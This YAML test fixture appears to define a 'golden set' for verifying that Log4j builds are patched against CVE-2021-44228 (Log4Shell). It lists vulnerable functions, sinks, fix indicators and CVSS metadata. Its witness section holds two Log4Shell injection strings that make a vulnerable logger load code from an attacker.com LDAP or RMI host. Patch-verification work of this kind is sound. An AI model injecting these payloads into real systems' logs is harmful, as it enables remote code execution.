# Golden Set: CVE-2021-44228 (Log4Shell) # Apache Log4j Remote Code Execution Vulnerability # # Sprint: SPRINT_20260110_012_010_TEST # Task: GTV-001 - High-profile Golden Sets # # This golden set defines the vulnerability targets for CVE-2021-44228, # allowing binary-level verification that a patch eliminates JNDI lookup. id: "CVE-2021-44228" version: "1.0.0" created: "2026-01-11T12:00:00Z" author: "stellaops-security" status: "approved" # Component identification component: name: "log4j-core" ecosystem: "maven" affectedVersions: - ">=2.0-beta9,<2.15.0" # Vulnerability details vulnerability: cveId: "CVE-2021-44228" aliases: - "Log4Shell" - "LogJam" severity: "CRITICAL" cvssScore: 10.0 description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. references: - url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" title: "NVD Entry" - url: "https://logging.apache.org/log4j/2.x/security.html" title: "Apache Security Advisory" # Vulnerability targets targets: - function: "lookup" className: "org/apache/logging/log4j/core/lookup/JndiLookup" symbolPattern: "org/apache/logging/log4j/core/lookup/JndiLookup.lookup" description: "JNDI lookup method - allows remote code execution" criticalEdges: - from: "method_entry" to: "jndi_context_lookup" description: "Entry to JNDI context lookup" sinks: - "javax/naming/Context.lookup" - "javax/naming/InitialContext." expectedPatchBehavior: "disable_jndi_lookup" - function: "format" className: "org/apache/logging/log4j/core/pattern/MessagePatternConverter" symbolPattern: "org/apache/logging/log4j/core/pattern/MessagePatternConverter.format" description: "Message pattern converter - triggers lookup substitution" criticalEdges: - from: "format_entry" to: "substitute_call" description: "Entry to variable substitution" sinks: - "org/apache/logging/log4j/core/lookup/StrSubstitutor.replace" expectedPatchBehavior: "disable_lookup_substitution" - function: "resolveVariable" className: "org/apache/logging/log4j/core/lookup/StrSubstitutor" symbolPattern: "org/apache/logging/log4j/core/lookup/StrSubstitutor.resolveVariable" description: "Variable resolver - invokes JNDI lookup" criticalEdges: - from: "resolve_entry" to: "interpolator_lookup" description: "Entry to interpolator lookup" sinks: - "org/apache/logging/log4j/core/lookup/Interpolator.lookup" expectedPatchBehavior: "add_jndi_filter" # Witness data witness: command: "java -Dlog4j2.formatMsgNoLookups=false -jar target.jar" inputs: - name: "jndi_ldap_payload.txt" description: "Log message with JNDI LDAP lookup" content: "${jndi:ldap://attacker.com/a}" trigger: "jndi_ldap_lookup" - name: "jndi_rmi_payload.txt" description: "Log message with JNDI RMI lookup" content: "${jndi:rmi://attacker.com/a}" trigger: "jndi_rmi_lookup" # Verification criteria verification: fixIndicators: - type: "class_removed" className: "org/apache/logging/log4j/core/lookup/JndiLookup" description: "JNDI lookup class removed (2.17.0+)" - type: "method_disabled" location: "JndiLookup.lookup" description: "Lookup returns null or throws" - type: "feature_flag" flag: "log4j2.formatMsgNoLookups" defaultValue: "true" description: "Lookup disabled by default (2.15.0+)" - type: "protocol_filter" allowedProtocols: ["java", "ldap", "ldaps"] description: "Protocol allowlist (2.15.0+)" expectedConfidence: fixed: 0.98 partial: 0.75 inconclusive: 0.40 # Metadata metadata: reviewedBy: "security-team" reviewedAt: "2026-01-11T12:00:00Z" approvedFor: "production" kev: true # Known Exploited Vulnerability cisa_due: "2021-12-24" tags: - "rce" - "jndi" - "log-injection" - "critical" - "kev"